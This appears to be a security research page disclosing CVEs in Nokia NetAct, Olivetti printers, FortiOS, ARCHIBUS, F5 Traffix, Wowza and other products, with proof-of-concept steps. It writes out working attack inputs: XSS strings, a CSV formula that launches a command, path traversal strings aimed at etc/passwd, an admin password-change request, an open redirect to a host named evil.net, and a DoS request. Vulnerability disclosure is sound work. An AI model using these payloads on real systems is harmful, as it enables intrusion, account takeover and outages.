Any user logged in the web application can view pages or use functionalities that are normally accessible only by specific roles. In some cases, these functionalities can be accessed even without authentication. This vulnerability can be exploited in order to gather critical information or in order to have unauthorized access to some functionalities.

Affected Endpoints

·        URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/advanced-settings.jsp

·        URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/SaveFileUploader

Below are the evidences with the vulnerability details and the payloads used

URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/advanced-settings.jsp

Vulnerability Research Image

Figure 1

 

Click to enlarge

As an example, a user with the “Administrator” role can access the advanced settings page, which is normally available only to “System Administrator” users. This vulnerability can by exploited by simply inserting the appropriate endpoint in the URL.

URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/SaveFileUploader

We can access the “Upload file” functionality in order to upload arbitrary files on the filesystem without authentication.

Vulnerability Research Image

Figure 2

 

Click to enlarge

Vulnerability Research Image

Figure 3

 

Click to enlarge

Security Impact

By exploiting this vulnerability on the web application it was possible to have unauthorized access to critical information and functionalities.

CVE-2022-39810 – WSO2 Enterprise Integrator

Vulnerability Description: Cross-Site Scripting - CWE-79

Software Version: 6.4.0

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39810

CVSv3: 6.1

Severity: Medium

Credits: Tiziano Di Vincenzo, Massimiliano Brolli

An issue was discovered in WSO2 Enterprise Integrator 6.4.0. A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Management Console under /carbon/ndatasource/validateconnection/ajaxprocessor.jsp via the “driver” parameter. Session hijacking or similar attacks would not be possible.

CVE-2022-39809 – WSO2 Enterprise Integrator

Vulnerability Description: Cross-Site Scripting - CWE-79

Software Version: 6.4.0

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39809

CVSv3: 6.1

Severity: Medium

Credits: Tiziano Di Vincenzo, Massimiliano Brolli

An issue was discovered in WSO2 Enterprise Integrator 6.4.0. A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Management Console under /carbon/mediation_secure_vault/properties/ajaxprocessor.jsp via the “name” parameter. Session hijacking or similar attacks would not be possible.

CVE-2022-30280 – Nokia NetAct

Vulnerability Description: Cross-Site Request Forgery (CWE-352)

Software Version: v22.0.0.62

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-30280

CVSv3: 8.8

Severity: High

Credits: Massimiliano Ferraresi, Massimiliano Brolli

/SecurityManagement/html/createuser.jsf in Nokia NetAct 22 allows CSRF. A remote attacker is able to create users with arbitrary privileges, even administrative privileges. The application (even if it implements a CSRF token for the random GET request) does not ever verify a CSRF token. With a little help of social engineering/phishing (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Step-by-step instructions and PoC

Figure 1

 

Click to Enlarge

It’s worth to remark that from the admin profile it is possible to add users with various privileges by exploiting this endpoint:

·       https://hostname/SecurityManagement/html/listusers.jsf

 

 

The following image shows the application  without testCSRF profile:

Figure 2

 

Click To Enlarge

The administrator, who is logged into the application, is induced to visit, by means of phishing or social engineering, an endpoint containing a specific HTML code csrf2.html

 

 

Then, the administrator's browser will sends the following HTTP requests to the NetAct application that accept the request with arbitrary Origin and Referer.

Figure 3

 

Click To Enlarge

Figure 4

 

Click To Enlarge

If a logged  system administrator visits the endpoint with malicious javascript code crafted by an attacker, the new user testCSRF will appear in the application with admin privileges.

Figure 5

 

Click To Enlarge

Security Impact

By exploiting this issue, a remote attacker is able to add arbitrary user on Nokia NetAct on behalf of a regular platform administrator.

CVE-2022-29540 – RESI S.p.A

Vulnerability Description: Multiple Cross-Site Scripting - CWE-79
Software Version: 4.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29540
CVSv3: 6.1
Severity: Medium
Credits
: Alessandro Bosco, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

RESI Gemini-Net 4.2 is affected by Multiple XSS issues. Unauthenticated remote attackers can inject arbitrary web script or HTML into an HTTP GET parameter that reflects user input without sanitization. This exists on numerous application endpoints.

CVE-2022-29539 – RESI S.p.A

Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection - CWE-78)
Software Version: 4.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29539
CVSv3: 9.8
Severity: Critical
Credits
: Alessandro Bosco, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

RESI Gemini-Net 4.2 is affected by OS Command Injection. It does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, an unauthenticated attacker can bypass the syntax intended by the software (e.g., concatenate `&|;\r\ commands) and inject arbitrary system commands with the privileges of the application user.

CVE-2022-29538 – RESI S.p.A

Vulnerability Description: Improper Access Control - CWE-284
Software Version: 4.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29538
CVSv3: 5.3
Severity: Medium
Credits
: Alessandro Bosco, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

RESI Gemini-Net Web 4.2 is affected by Improper Access Control in authorization logic. An unauthenticated user is able to access some critical resources.

CVE-2022-28867 – Nokia NetAct

Vulnerability Description: Cross-Site Scripting Stored (Administration of Measurements) – CWE-79

Software Version: v22.0.0.62

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28867

CVSv3: 5.4

Severity: Medium

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

An issue was discovered in Nokia NetAct 22 through the Administration of Measurements website section. A malicious user can edit or add the templateName parameter in order to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /aom/html/EditTemplate.jsf and /aom/html/ViewAllTemplatesPage.jsf templateName parameter is used.

Step-by-step instructions and PoC

A remote user, authenticated to the NOKIA NetAct Web Page, through Administration of Measurements web site section, can arbitrary upload a file with a filename that contains an HTML code, more specifically javascript code inside some HTML tags.

 

Affected Endpoints

·       URL: https://hostname//aom/html/EditTemplate.jsf 

·       URL: https://hostname//aom/html/ViewAllTemplatesPage.jsf?tab=3 

·       Parameter: templateName

Figure 1

 

Click To Enlarge

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

Figure 2

 

Click To Enlarge

This first step consists in visiting the vulnerable page and injecting the malicious payload as value of the parameter “Template Name”.

Figure 3

 

Click To Enlarge

The result is that the JavaScript code will be executed as depicted by the following picture.

Figure 4

 

Click To Enlarge

Security Impact

By exploiting this issue an attacker is able to target administrator users who are able to access the plugin configuration page within the browser with several type of direct or indirect impacts such as stealing cookies (if the HttpOnly flag is missing from the session cookies), modifying a web page, capturing clipboard contents, keylogging, port scanning, dynamic downloads and other attacks. This type of reflected XSS does require user interaction.

CVE-2022-28866 – Nokia AirFrame BMC

Vulnerability Description: Improper Access Control- CWE-284

Software Version: < R18 Firmware v4.13.00

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28866

CVSv3: 8.8

Severity: High

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

Multiple Improper Access Control was discovered in Nokia AirFrame BMC Web GUI < R18 Firmware v4.13.00. It does not properly validate requests for access to (or editing of) data and functionality in all endpoints under /#settings/* and /api/settings/*. By not verifying the permissions for access to resources, it allows a potential attacker to view pages, with sensitive data, that are not allowed, and modify system configurations also causing DoS, which should be accessed only by user with administration profile, bypassing all controls (without checking for user identity).

Affected Endpoints

·       URL: https://[IP]/#settings/ext_users

·       URL: https://[IP]/#settings/redundancy

·       URL: https://[IP]/#settings/services/edit/2

·       URL: https://[IP]/#settings/mouse

·       URL: https://[IP]/#settings/log

·       URL: https://[IP]/#settings/pef

·       URL: https://[IP]/#settings/smtp

·       URL: https://[IP]/#settings/ssl

·       URL: https://[IP]/#settings/firewall

·       URL: https://[IP]/#settings/sol

·       URL: https://[IP]/api/settings/*

Step-by-step instructions and PoC

The following images show some vulnerable endpoints, as PoC, that can be accessed by an unauthorized user:

The following steps show that an Operator user is able to edit configuration pages bypassing both access controls on the endpoint and client side access controls. In the specific case, the endpoint under analysis is: https://[IP]/#settings/redundancy.

As a first step, you can enable any javascript by removing the "disabled" attribute within the "select" and "a" tags..

The next image shows the request sent by the nonprivileged operator user to change the configuration and its response

The last image shows that the Operator user has successfully changed the configuration.

CVE-2022-28865 – Nokia NetAct

Vulnerability Description: Cross-Site Scripting Stored (Site Configuration Tools) – CWE-79

Software Version: v22.0.0.62

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28865

CVSv3: 5.4

Severity: Medium

Credits: Andrea Carlo Maria Dattola, Raffaella Robles, Massimiliano Brolli

An issue was discovered in Nokia NetAct 22 through the Site Configuration Tool website section. A malicious user can change a filename of an uploaded file to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /netact/sct filename parameter is used.

Step-by-step instructions and PoC

A remote user, authenticated to the NOKIA NetAct Web Page, through Site Configuration Tool web site section, can arbitrary upload a file with a filename that contains an HTML code, more specifically javascript code inside some HTML tags.

 

Affected Endpoints

·       URL: https://hostname/netact/sct

·       HTTP Parameter: filename

Figure 1

 

Click To Enlarge

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

Figure 2

 

Click To Enlarge

This first step consists in visiting the vulnerable page and injecting the malicious payload exploiting the Unrestricted File Upload vulnerability.

The result is that the JavaScript code will be executed as depicted by the following picture.

Figure 4

 

Click To Enlarge

Security Impact

By exploiting this issue an attacker is able to target administrator users who are able to access the plugin configuration page within the browser with several type of direct or indirect impacts such as stealing cookies (if the HttpOnly flag is missing from the session cookies), modifying a web page, capturing clipboard contents, keylogging, port scanning, dynamic downloads and other attacks. This type of reflected XSS does require user interaction.

CVE-2022-28864 – Nokia NetAct

Vulnerability Description: Improper Neutralization of Formula Elements in a CSV File (‘CSV Injection’) – CWE-1236

Software Version: v22.0.0.62

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28864

CVSv3: 8.8

Severity: High

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

An issue was discovered in Nokia NetAct 22 through the Administration of Measurements website section. A malicious user can edit or add the templateName parameter in order to include malicious code, which is then downloaded as a .csv or .xlsx file and executed on a victim machine. Here, the /aom/html/EditTemplate.jsf and /aom/html/ViewAllTemplatesPage.jsf templateName parameter is used

Step-by-step instructions and PoC

A remote user, authenticated to the Nokia NetAct Web Page, through Administration of Measurements web site section, can submit the payload “=50+60+cmd|’ /C calc ‘!A0” as the templateName of the component domains objects.

 

Affected Endpoints

·       URL: https://hostname//aom/html/EditTemplate.jsf

·       URL: https://hostname//aom/html/ViewAllTemplatesPage.jsf


Parameter: templateName 

Figure 1

 

Click To Enlarge

The following payload shows the vulnerable templateName parameter into which the malicious content is injected from the /aom/html/EditTemplate.jsf POST Request:

Figure 2

 

Click To Enlarge

This image below shows the operation that the victim does when he chooses to export the malicious content in CSV format.

Figure 3

 

Click To Enlarge

The  following image shows how the export request does not sanitize the malicious content when downloading the CSV file format from the /aom/html/ViewAllTemplatesPage.jsf POST Request. 

Figure 4

 

Click To Enlarge

As shown in the next screenshot, the malicious payload is finally executed. In our specific case the administrator’s machine is opening Microsoft Calculator.

Figure 5

 

Click To Enlarge

Security Impact

By exploiting this issue an attacker is able to inject arbitrary formulas into CSV files.
This can potentially lead to remote code execution at client side (DDE) or to data leakage via maliciously injected hyperlinks.

CVE-2022-28863 – Nokia NetAct

Vulnerability Description: Unrestricted Upload of File with Dangerous Type – CWE-434

Software Version: v22.0.0.62

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28863

CVSv3: 8.8

Severity: High

Credits: Andrea Carlo Maria Dattola, Raffaella Robles, Massimiliano Brolli

An issue was discovered in Nokia NetAct 22. A remote user, authenticated to the website, can visit the Site Configuration Tool section and arbitrarily upload potentially dangerous files without restrictions via the /netact/sct dir parameter in conjunction with the operation=upload value.

 

Step-by-step instructions and PoC

A remote user, authenticated to the NOKIA NetAct Web Page, through Site Configuration Tool web site section, can arbitrary upload potentially dangerous files without restrictions

 

Affected Endpoints

·       URL: https://hostname/netact/sct

·       HTTP Parameter: operation, dir

Figure 1

 

Click To Enlarge

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

Figure 2

 

Click To Enlarge

This first step consists in the successful arbitrary uploading of a file exploiting the affected URL inside the machine. In the specific casa it has been uploaded a text file containing the EICAR test string, which aims to simulate a malware that is recognized from all Antivirus solutions.

Figure 3

 

Click To Enlarge

In next picture it is possible to see that file has been successfully uploaded.

Figure 4

 

Click To Enlarge

For further information about EICAR: https://www.eicar.org/?page_id=3950

 

Security Impact

This vulnerability would allow an attacker to exploit the platform by injecting malware and, under certain conditions, to execute code in the remote machine.

CVE-2022-28862 – ARCHIBUS Web Central

Vulnerability Description: SQL Injection Multiple Vulnerabilities - CWE-89
Software Version: <26.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28862
CVSv3: 9.8
Severity: Critical
Credits
: Claudio Rizzo, Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli

In ARCHIBUS Web Central <26.2, multiple SQL Injection vulnerabilities occur in /archibus/dwr/call/plaincall/workflow.runWorkflowRule.dwr. Through the injection of arbitrary SQL statements, a potential attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.

NOTE: This vulnerability is fixed in all versions, even those that are no longer supported by the maintainer.

 

CVE-2022-27880 – F5 Traffix Signal Delivery Controller

Vulnerability Description: Stored Cross-Site Scripting - CWE-79
Software Version: 5.1.0, 5.2.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-27880
CVSv3: 4.8
Severity
: Medium
Credits:
 Valerio Alessandroni, Matteo Brutti, Massimiliano Brolli

The Web application of F5 SDC doesn't check properly the parameters sent as input in HTTP requests, before saving them in the server. In addition, the JavaScript malicious content is then reflected back to the end user and executed by the web browser.

Step-by-step instructions and PoC

An authenticated remote user can inject arbitrary code aiming to trigger malicious javascript code on browsers which visit infected pages

Affected Endpoints

Malicious javascript code is injected through the parameter “User Name” as shown below:

The previously injected malicious code is stored within the page.

CVE-2022-27662 – F5 Traffix Signal Delivery Controller

Vulnerability Description: Stored Client-Side Template Injection-CWE-1336
Software Version: 5.1.0, 5.2.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-27662
CVSv3: 4.8
Severity
: Medium
Credits:
 Valerio Alessandroni, Matteo Brutti, Massimiliano Brolli

In Traffix Signal Delivery Controller 5.1.0 and 5.2.0, stored client-side template injection (CSTI) was possible, which could lead to code execution.

Step-by-step instructions and PoC

An authenticated remote user can inject arbitrary code aiming to exploit the template engine to execute malicious javascript code on browsers which visit infected pages.

Affected Endpoints

  • URL: https://[host]/MgmtConsole/mgmtconsole/rest/administration/QDEARM002/snmp/AddSnmpProfile
  • HTTP Parameter: User Name

Malicious javascript code is injected through the parameter “User Name”, inserting an operation (e.g., in this case {{7*7}} ) to be executed by the victim’s browser as shown below:

The previously injected malicious code is stored within the page and executed as the page is loaded in the browser.

CVE-2022-26484 – Veritas Operations Manager

Vulnerability Description: Absolute Path Traversal – CWE-36
Software Version: 6.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-26484
CVSv3: 4.9
Severity: Medium
Credits
: Luca Carbone, Antonio Papa, Vincenzo Nigro, Massimiliano Brolli

The web server fails to sanitize the input data allowing a remote authenticated attacker to read arbitrary files on the system. By manipulating the resource name in the GET requests referring to files with absolute paths, it is possible to access arbitrary files stored on the filesystem, including application source code, configuration files and critical system files.

CVE-2022-26483 – Veritas Operations Manager

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') - CWE-79
Software Version: 6.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-26483
CVSv3: 4.8
Severity: Medium
Credits
: Luca Carbone, Antonio Papa, Vincenzo Nigro, Massimiliano Brolli

Cross-site scripting Reflected (XSS) vulnerability affects the Veritas Operations Manager application, which allows authenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflect the user input without sanitization.
The Veritas Operations Manager web application does not properly check parameters sent via GET methods which are included in the server response.

CVE-2022-25344 – Olivetti d-COLOR MF3555

Vulnerability Description: CWE-79: Cross-Site Scripting Stored
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25344
CVSv3: 6.1
Severity
: Medium
Credits:
 Mattia Campanelli, Luca Carbone, Massimiliano Brolli

An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The Web Application doesn't properly check parameters, sent in a /dvcset/sysset/set.cgi POST request via the arg01.Hostname field, before saving them on the server. In addition, the JavaScript malicious content is then reflected back to the end user and executed by the web browser.

NOTE: This vulnerability has been fixed in the available firmware version 2XD_S000.002.703 from January 17th, 2022 and later versions.

Step-by-step instructions and PoC

The vulnerable functionality can be reached through the following actions:

  • Impostazioni Dispositivo > Sistema
    A PoC is possibile intercepting the POST request to /dvcset/sysset/set.cgi, after update the settings on the page.  Then we can insert the malicious string in the arg01.Hostname parameter:
  • <img src=# onerror=alert(1337)/>
    This payload needs to be URL encoded in order to bypass client-side security filters. Subsequently, we visit the /jobs page to spawn the Javascript malicious code.

Affected Endpoints

  • URL: /dvcset/sysset/set.cgi
  • HTTP Parameter: Host (arg01.Hostname)

Below are the evidences with the vulnerability details and the payloads used.

CVE-2022-25344-1

Figure 1: Administrative page to change the Host name

Click here to enlarge the image

CVE-2022-25344-2

Figure 2: The malicious payload will be URL encoded, to bypass the client-side filters

Click here to enlarge the image

CVE-2022-25344-3

Figure 3: /jobs page stored javascript code

Click here to enlarge the image

CVE-2022-25343 – Olivetti d-COLOR MF3555

Vulnerability Description: CWE-400: Denial of Service
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25343
CVSv3: 7.5
Severity
: High
Credits:
 Mattia Campanelli, Luca Carbone, Massimiliano Brolli

An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The Web Application is affected by Denial of Service. An unauthenticated attacker, who can send POST requests to the /download/set.cgi page by manipulating the failhtmfile variable, is able to cause interruption of the service provided by the Web Application.

NOTE: This vulnerability has been fixed in the available firmware version 2XD_S000.002.703 from January 17th, 2022 and later versions.

Step-by-step instructions and PoC

The vulnerability is an unauthenticated POST request to the page /download/set.cgi. The web application get on system error by manipulating the variable failhtmfile and adding a relative path to a non-existent file, with most of the common path traversal payloads:

  • .;%2f.;%2f.;%2f.;%2f.;%2f.;%2fetc%2fpasswd
  • ..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

…and so on.

After that, all the resources of the Web Application will answer 404 Not Found, until the printer is restarted.

Affected Endpoints

  • URL: /download/set.cgi
  • HTTP Parameter: failhtmfile

Below are the evidences with the vulnerability details and the payloads used.

CVE-2022-25343-1

Figure 1: System error - 404 Not Found on all resources

Click here to enlarge the image

CVE-2022-25342 – Olivetti d-COLOR MF3555

Vulnerability Description: CWE-284: Improper Access Control
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25342
CVSv3: 8.1
Severity
: High
Credits:
 Vincenzo Nigro, Massimiliano Brolli

An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The Web Application is affected by Broken Access Control. It does not properly validate requests for access to data and functionality under the /mngset/authset path. By not verifying permissions for access to resources, it allows a potential attacker to view pages that are not allowed.

NOTE: This vulnerability has been fixed in the available firmware version 2XD_S000.002.703 from January 17th, 2022 and later versions.

Step-by-step instructions and PoC
If you have access to the credentials of a user (non-administrator), with at least one system administrator permission (as shown in Figure 1), it is possible to modify the details of any user, even of an administrator, including the password: the following figure shows the permissions of testpt user.

CVE-2022-25342-1

Figure 1: Permission needed to reproduce the attack

Click here to enlarge the image

Once you logged in as testpt user, you have to click on “Impostazioni di gestione” and then on “Riavvio/Reset” while intercepting the request using burpsuite.

CVE-2022-25342-2

Figure 2: Panel of testpt user

Click here to enlarge the image

CVE-2022-25342-3

Figure 3: HTTP request intercepted when clicking on “riavvio/reset”

Click here to enlarge the image

At this point, by substituting the following URL is possible to spawn the admin panel with all the users of the system

  • GET /mngset/authset/MngSet_Auth_NewUsrPrpty.htm?arg1=1&arg2=0&arg3=&arg4=1&arg5=1&arg6=&arg50=0 HTTP/1.1
CVE-2022-25342-4

Figure 4: Admin panel with all user settings, from the unprivileged account testpt

Click here to enlarge the image

By clicking on any user you can bring up the properties panel, where you can edit his information, including its password.

CVE-2022-25342-5

Figure 5: Properties panel of user Admin, from the unprivileged account testpt

Click here to enlarge the image

By clicking “Invia” POST request will be made, and the password of the user will be modified.

CVE-2022-25342-6

Figure 6: POST request to change Admin password

Click here to enlarge the image

In this way you can be able to login in as Admin user with the new password and then you can create new accounts or edit all kind of settings.

CVE-2021-43080 – Fortinet FortiOS

Vulnerability Description: Stored Cross-Site Scripting - CWE-79

Software Version: FortiOS version 7.2.0, version 6.4.0 through 6.4.9, version 7.0.0 through 7.0.5

NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-43080

CVSv3: 5.4

Severity: Medium

Credits: Massimiliano Ferraresi, Massimiliano Brolli

An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiOS version 7.2.0, version 6.4.0 through 6.4.9, version 7.0.0 through 7.0.5 may allow an authenticated attacker to perform a stored cross site scripting (XSS) attack through the URI parameter via the Threat Feed IP address section of the Security Fabric External connectors.

 

Affected Endpoints

•     URL: https://x.x.x.x/api/v2/monitor/system/external-resource/entry-list?mkey=

 

Step-by-step instructions and PoC

An attacker have to create a malicious HTTP server reachable from fortigate, in this case we created an http server with a malicious list of XSS payload (e.g. xss2.txt):

CVE-2021-43080_3

Figure 1 Http server with xss payload

An attacker have to add an external “IP Address" connector from this fields:

·        Security Fabric > External Connectors > Create New > Ip Address

CVE-2021-43080_2

Figure 2 External Connectors page

In the “name” and “comment” fields we wrote arbitrary values, disable HTTP basic authentication and in the “URI of external resource” we inserted the address of our webserver with the path of xss payloads:

CVE-2021-43080_3

Figure 3 Configuring remote address

Click on “ok” and save the setting, after 5 minute the Fortigate will contact the server and it parses our file:Click on “ok” and save the setting, after 5 minute the Fortigate will contact the server and it parses our file:

CVE-2021-43080_4

Figure 4 Fortigate parse xss2.txt file

Now click on  “View Entries”  tab:

CVE-2021-43080_5

Figure 5 View invalid entries

And a malicious xss payloads (javscript code) will run correctly:And a malicious xss payloads (javscript code) will run correctly:

CVE-2021-43080_6

Figure 6 javascript alert

CVE-2021-41555 – ARCHIBUS Web Central

Vulnerability Description: Multiple Stored Cross-Site Scripting - CWE-79
Software Version: 21.3.3.815
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41555
CVSv3: 6.1
Severity
: Medium
Credits:
 Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli

** UNSUPPORTED WHEN ASSIGNED **
In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), XSS occurs in /archibus/dwr/call/plaincall/workflow.runWorkflowRule.dwr because the data received as input from clients is re-included within the HTTP response returned by the application without adequate validation. In this way, if HTML code or client-side executable code (e.g., Javascript) is entered as input, the expected execution flow could be altered. This is fixed in all recent versions, such as version 26.

NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.

CVE-2021-41554 – ARCHIBUS Web Central

Vulnerability Description: Multiple Broken Access Control- CWE-284
Software Version: 21.3.3.815
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41554
CVSv3: 8.8
Severity
: High
Credits:
 Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli

** UNSUPPORTED WHEN ASSIGNED **
ARCHIBUS Web Central 21.3.3.815 (a version from 2014) does not properly validate requests for access to data and functionality in these affected endpoints:

/archibus/schema/ab-edit-users.axvw/archibus/schema/ab-data-dictionary-table.axvw, /archibus/schema/ab-schema-add-field.axvw, /archibus/schema/ab-core/views/process-navigator/ab-my-user-profile.axvw. By not verifying the permissions for access to resources, it allows a potential attacker to view pages that are not allowed. Specifically, it was found that any authenticated user can reach the administrative console for user management by directly requesting access to the page via URL. This allows a malicious user to modify all users' profiles, to elevate any privileges to administrative ones, or to create or delete any type of user. It is also possible to modify the emails of other users, through a misconfiguration of the username parameter, on the user profile page.  This is fixed in all recent versions, such as version 26.

NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.

CVE-2021-41553 – ARCHIBUS Web Central

Vulnerability Description: Multiple User Session Vulnerabilities - CWE-1018
Software Version: 21.3.3.815
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41553
CVSv3: 9.8
Severity
: Critical
Credits:
 Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli

** UNSUPPORTED WHEN ASSIGNED **
In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), the Web Application in /archibus/login.axvw assign a session token that could be already in use by another user. It was therefore possible to access the application through a user whose credentials were not known, without any attempt by the testers to modify the application logic. It is also possible to set the value of the session token, client-side, simply by making an unauthenticated GET Request to the Home Page and adding an arbitrary value to the JSESSIONID field. The application, following the login, does not assign a new token, continuing to keep the inserted one, as the identifier of the entire session. This is fixed in all recent versions, such as version 26.

NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.

CVE-2021-38123 – Micro Focus Network Automation

Vulnerability Description: Open Redirect - CWE-601
Software Version: <= 2019.05
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-38123
CVSv3: 6.1
Severity
: Medium
Credits:
 Veno Eivazian, Massimiliano Brolli

The Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is '/device.save.do'. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

The application presents an Open Redirect on the Host parameter, when the /device.save.do endpoint is requested via an HTTP POST request.

To exploit the vulnerability, the following HTTP request is used:

POST /device.save.do HTTP/1.1
Host: this.is.my.domain.evil.net
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: https://hostname
Connection: close
Referer: https://hostname/device.edit.do?deviceID=201
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

An attacker can send a link containing JavaScript code that allows a user who runs the code to be automatically redirected to a domain owned by the attacker himself.
The redirect is performed via the HTTP Location response header.

CVE-2021-38123-1

Figure 1: Open Redirect

Click here to enlarge the image

The victim is thus redirected to a malicious domain:

CVE-2021-38123-2

Figure 2: Open Redirect

Click here to enlarge the image

To perform this attack, the user does not need to be authenticated to the target application.

CVE-2021-36200 – Johnson Controls Metasys MREWeb Service

Vulnerability Description: Missing Authentication for Critical Function - CWE-306

 

Software Version: Johnson Controls Metasys MREWeb Service 9.0.0.4256

NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-36200

CVSv3: 5.3

Severity: Medium

Credits: Alessandro Bosco, Luca Di Giuseppe, Stefano Scipioni, Massimiliano Brolli

Under certain circumstances an unauthenticated user could access the web API for Metasys ADS/ADX/OAS 10 versions prior to 10.1.6 and 11 versions prior to 11.0.2 and enumerate users.

CVE-2021-35492 – Wowza Streaming Engine

Vulnerability Description: Uncontrolled Resource Consumption – CWE-400
Software Version: <= 4.8.11+5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35492
CVSv3: 6.5
Severity
: Medium
Credits:
 Veno Eivazian, Massimiliano Brolli

A remote user, authenticated to the Wowza Streaming Engine web interface, through Virtual Host Monitoring section, could exhaust filesystem resources, resulting in a denial of service (DoS) condition on an affected application. This vulnerability is due to the insufficient management of available filesystem resources. An attacker could exploit this vulnerability by requesting random virtual host historical data and exhausting available filesystem resources. A successful exploit could allow the attacker to cause database errors and cause the device to become unresponsive to web-based management. Manual intervention is required to free filesystem resources and return the application to an operational state.

To exploit the vulnerability, intercept the browser session with a proxy like Burp Suite.

Then, go to the Virtual Host Monitoring section:

CVE-2021-35492-1

Figure 1: DoS - Virtual Host Monitoring - Web Interface

Click here to enlarge the image

An HTTP request will be automatically performed to view the historical data of the default virtual host.

The request on Burp Suite will be like the next screenshot.

CVE-2021-35492-2

Figure 2: DoS - Regular HTTP request

Click here to enlarge the image

Every time virtual host monitoring data is requested, a new file is created or appended on the filesystem.

By default, this is the starting condition on the folder /usr/local/WowzaStreamingEngine-4.8.11+5/stats/:

CVE-2021-35492-3

Figure 3: DoS - Filesystem on normal condition

Click here to enlarge the image

The attack can be performed using Burp Repeater, using the same request captured with the proxy, changing only the vhost parameter value. The response will be HTTP 200 OK:

CVE-2021-35492-4

Figure 4: DoS - New virtual host HTTP request

Click here to enlarge the image

Alternatively, the same can be achieved with the following payload:

GET /enginemanager/server/vhost/historical.jsdata?vhost=_defaultVHost_pippo_&periodStart=2021-06-03T13%3A47%3A44%2B02%3A00&periodEnd=2021-06-03T14%3A47%3A44%2B02%3A00&_=1622724285834 HTTP/1.1
Host: wse.local:8088
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://wse.local:8088/enginemanager/Home.htm
Cookie: JSESSIONID=E1EC2C1050D74EB0E4DA9474789E8F5E; lastMangerHost=http%3A//127.0.0.1%3A8087; showRightRail=true; DoNotShowFTU=false; lastTab=Basic

